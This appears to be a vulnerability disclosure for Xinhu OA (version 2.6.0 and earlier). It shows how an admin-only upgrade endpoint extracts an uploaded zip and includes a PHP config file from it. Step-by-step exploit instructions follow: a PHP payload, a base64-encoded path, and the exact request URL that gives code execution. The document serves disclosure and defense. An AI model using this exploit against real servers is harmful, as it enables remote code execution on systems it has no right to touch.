Utilization conditions:
-
Have administrator account privileges with admin id 1
-
rockinzip
is configured as true in /config/config.php
Origin
<= version 2.6.0,in /webmain/system/upgrade/upgradeAction.php
First, format the code
function loadinstallinfoAjax
public function loadinstallinfoAjax()
{
if (getconfig('systype') == 'demo') return returnerror('演示不要操作');
if ($this->adminid != 1) return returnerror('不是管理员不要操作');
$nwsp = $this->get('path');
if (!$nwsp) {
$nwsp = '';
} else {
$nwsp = $this->jm->base64decode($nwsp);
}
if (isempt($nwsp)) return returnerror('无效安装');
if (is_numeric($nwsp)) {
$barr = c('xinhuapi')->getdata('other', 'instinfo', array('id' => $nwsp,));
if (!$barr['success']) return $barr;
$farr = $barr['data']['farr'];
$filesize = $barr['data']['filesize'];
} else {
if (!getconfig('rockinzip')) return returnerror('系统未开启此功能');
$farr = c('zip')->zipget($nwsp);
if (!is_array($farr)) return returnerror($farr);
$filesize = filesize($nwsp);
}
$path = '' . UPDIR . '/logs/' . md5($nwsp) . '';
$filestr = '';
$agentstr = '';
$tablestr = '';
$menustr = '';
foreach ($farr as $k => $rs) {
$_pluj = $rs['filepath'];
$spath = $path . '/' . $_pluj;
$conts = $rs['filecontent'];
if (!contain($_pluj, 'installconfig')) {
$filestr .= '' . $_pluj . '<br>';
$fileext = substr($_pluj, -3);
if ($fileext == 'jpg' || $fileext == 'png' || $fileext == 'gif') {
if ($conts) $this->rock->createtxt($spath, base64_decode($conts));
}
} else {
$this->rock->createtxt($spath, base64_decode($conts));
}
}
$confpath = $path . '/installconfig/xinhuoa_config.php';
if (!file_exists($confpath)) return '无效安装包' . $confpath . '';
$conf = require($confpath);
$modepath = $path . '/installconfig/xinhuoa_data.json';
$mysqlpath = $path . '/installconfig/xinhuoa_mysql.json';
$modestr = '';
$menuarr = array();
if (file_exists($modepath)) {
$dsta = json_decode(file_get_contents($modepath), true);
if (isset($dsta['mode'])) foreach ($dsta['mode'] as $bh => $info) {
$modestr .= '' . $info['flow_set']['name'] . '(' . $bh . ') ';
}
if (isset($dsta['menu'])) foreach ($dsta['menu'] as $cd => $cdrs) {
if ($cd > 0) $menustr .= '<div style="margin:5px 0px" class="blank1"></div>';
$menustr .= '<input class="btn btn-default btn-xs" click="xuancaid,' . $cdrs['id'] . '" type="button" value="选上级菜单"><br>' . $cdrs['name'] . '(' . $cdrs['url'] . ')';
$menuarr[$cdrs['id']] = '-1';
if (isset($cdrs['children'])) foreach ($cdrs['children'] as $cd1 => $cdrs1) {
$menustr .= '<br> ┣' . $cdrs1['name'] . '(' . $cdrs1['url'] . ') ';
if (isset($cdrs1['children'])) foreach ($cdrs1['children'] as $cd2 => $cdrs2) {
$menustr .= '<br> ┣' . $cdrs2['name'] . '(' . $cdrs2['url'] . ') ';
}
}
}
if (isset($dsta['yydata'])) foreach ($dsta['yydata'] as $yb => $ybrs) {
$agentstr .= '<img src="' . $path . '/' . $ybrs['data']['face'] . '" align="absmiddle" width="20px" height="20px">' . $ybrs['data']['name'] . ' ';
}
}
if (file_exists($mysqlpath)) {
$dstd = json_decode(file_get_contents($mysqlpath), true);
foreach ($dstd as $dbs => $nse) {
$tablestr .= ',' . $dbs . '';
}
}
if ($tablestr) $tablestr = substr($tablestr, 1);
$conf['modestr'] = $modestr;
$conf['filestr'] = $filestr;
$conf['tablestr'] = $tablestr;
$conf['menustr'] = $menustr;
$conf['agentstr'] = $agentstr;
$conf['menuarr'] = $menuarr;
$conf['pathstr'] = $this->jm->base64encode($nwsp);
$conf['filesizecn'] = $this->rock->formatsize($filesize);
return returnsuccess($conf);
}
The first utilization condition is that we need to have account permissions with adminid=1
![image](https://private-user-images.githubusercontent.com/142081882/285372134-06c98e79-133f-480f-ad07-6b8531358753.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1MzcyMTM0LTA2Yzk4ZTc5LTEzM2YtNDgwZi1hZDA3LTZiODUzMTM1ODc1My5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04YWRkZWIwZDc0NDIzNzhkYjE3ZTVkNTg5ODgxZWNkYTViOGVlYWRiYTk2NTQwZGEzZmNkNTM2NjA3OWM0NmIyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.EkwWQv4QgO8D_Xs-LZAH9Mk5VeSBHfZfmiFp4ed46kQ)
When we pass in a get parameter path
, this function will base64 decode path
and determine whether it is a numeric string. If it is, it will call the API on the official website to download from the plugin market. If it is not, it will determine whether rockinzip
is configured in the /config/config.php
as true. If it is true, the zipget
function will be called for decompression. Therefore, the second utilization condition appears here, which requires the rockinzip
value in the config to be true
![image](https://private-user-images.githubusercontent.com/142081882/285372305-151797c2-f512-443e-bbc3-450f13cc9a11.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1MzcyMzA1LTE1MTc5N2MyLWY1MTItNDQzZS1iYmMzLTQ1MGYxM2NjOWExMS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lN2I3MjUxNjU2NTFjODA5MGVjOGE2OTc5YzJjODYzY2RiNGNlODlkZmE0MmUyZGJlYjc2YTBlYzk2ZDJlMjk2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.AgJ8TJgPm5Ty1nRel4KK0_aKYtb5QNWgPz6imvKjLQQ)
function zipget
will unzip the zipfile, but file content will be base64 encode
/include/chajian/zipChajian.php
![image](https://private-user-images.githubusercontent.com/142081882/285373516-09496f75-9395-4140-82d2-dc7473592665.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1MzczNTE2LTA5NDk2Zjc1LTkzOTUtNDE0MC04MmQyLWRjNzQ3MzU5MjY2NS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xMzU4ODk1NTNkZTQyMjVlMWJhYWE2NmQyMWNmZTMxNzkxNDJkZjFlMTEzNDUyZTdjOGJmZGQ3M2I1OTM1NWVlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.2u-wxeIkZwwTJ5KL81BYhRXZ-eSOFlOBdMLSTgM3DjM)
It's okay, because in the loadinstallinfoAjax function, the file content will be decoded below, but the path will be moved to '' . UPDIR . '/logs/' . md5($nwsp) . ''
![image](https://private-user-images.githubusercontent.com/142081882/285374029-e44b16d0-048c-4213-a012-e031b6cedd13.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc0MDI5LWU0NGIxNmQwLTA0OGMtNDIxMy1hMDEyLWUwMzFiNmNlZGQxMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYWZmMDEwYWEwNDY4MmZlN2MyYjVmZjQ0ZmM1NzJhYjY3NTA2NTY3MDQ4NmFjOWFlMjkwZjczMWIzYTczOGZiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.GNCZcyTACcT-ULK_CO0gV4AedgL_x_ZodHPJldIHo8w)
It seems too troublesome, it's okay. There's something interesting coming up below.
When the compressed file is decompressed and moved to (encoded and decoded) '' . UPDIR . '/logs/' . md5($nwsp) . ''
, it will determine whether there is a $path . '/installconfig/xinhuoa_config.php'
file. If there is, it will include
![image](https://private-user-images.githubusercontent.com/142081882/285374369-fcc8794c-f7fc-4921-a849-f3883c0a4702.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc0MzY5LWZjYzg3OTRjLWY3ZmMtNDkyMS1hODQ5LWYzODgzYzBhNDcwMi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zODJmMTNjYzdlNWEyYWVjMzFhMGFlYjNkMGU2ODQ1MDUzZTFlYTVmOThiZTBmZjJjZjU4YWUyMTA3NWZmY2QyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.0NdlzaDUn1S965z-huocuWD_kbeZwhlIZu0EZd7EyQ0)
How to use
make a zip
|-installconfig
....|-xinhuoa_config.php
put content to xinhuoa_config.php
<?php
file_put_contents("/tmp/shell.txt", "ok");
first, upload this compressed package anywhere and obtain the upload path
![image](https://private-user-images.githubusercontent.com/142081882/285375655-a8fdc07f-d674-431d-8474-bb50f24e4f37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc1NjU1LWE4ZmRjMDdmLWQ2NzQtNDMxZC04NDc0LWJiNTBmMjRlNGYzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iN2Q3MTcxMjdmNDZlN2NkZDllY2UyMTk5OTQwZDUxNzgxYmY3ZjQ0ZTNjZTg5ZjRmNTM5YzI1ZjI4ZmYwM2QxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.8VTGtaWTO9Ox-MrYGREK1Y8CWA4yn7nddeF35A1orNY)
base64 encode file path
![image](https://private-user-images.githubusercontent.com/142081882/285375803-3def2689-c68f-40a2-92e3-9a7100398d37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc1ODAzLTNkZWYyNjg5LWM2OGYtNDBhMi05MmUzLTlhNzEwMDM5OGQzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wZDA3MWU3NjI3ZDFmMDI0MTdjNjljNGEyYWZhM2FkMmVmMzAwNzU4MjA4Yjc2OTI5YWY4MWVhMGRiMDJkZmQ5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.d_rqu2R3suKjo3JDWQ_acV8pkxBQeC5QUc4GXtoCppw)
request /index.php?a=loadinstallinfo&m=upgrade&d=system&ajaxbool=true&rnd=39613&path=FILE_PATH_BASE64_ENCODE
![image](https://private-user-images.githubusercontent.com/142081882/285375968-f0daa19c-a7d4-4573-a7e1-0b2fe6a200ca.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc1OTY4LWYwZGFhMTljLWE3ZDQtNDU3My1hN2UxLTBiMmZlNmEyMDBjYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00NDE0YzAxMzgxOGNjNzE3MjBhYjdiNzUyNDY2ZWVkNzIwZWZmNzc2MmEyNGY1MzBiYmFjOGNhOGViYTQyZjYyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.DbHc8GaZfUMHDNikWtIvDquNoDzXXIAX9nTjgvHmWsE)
Our code has been executed and/tmp/shell.txt has been written
![image](https://private-user-images.githubusercontent.com/142081882/285376132-898fe314-e0b9-4196-b165-96ce2aba7116.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTQ4NjYxMzAsIm5iZiI6MTcxNDg2NTgzMCwicGF0aCI6Ii8xNDIwODE4ODIvMjg1Mzc2MTMyLTg5OGZlMzE0LWUwYjktNDE5Ni1iMTY1LTk2Y2UyYWJhNzExNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwNTA0JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDUwNFQyMzM3MTBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04ZGU3ZGNkYTcxZjk5ZmQ4OTk5ZTJlYWRkNmUzZGE1NjJiODY1YjUzNGI4ZjhlZTBiMzUzZWRhZTM0YzUwZjRiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ucmKh51zDnCuniJW6XtmDC5yklC_MxsXr-5eNmayLXI)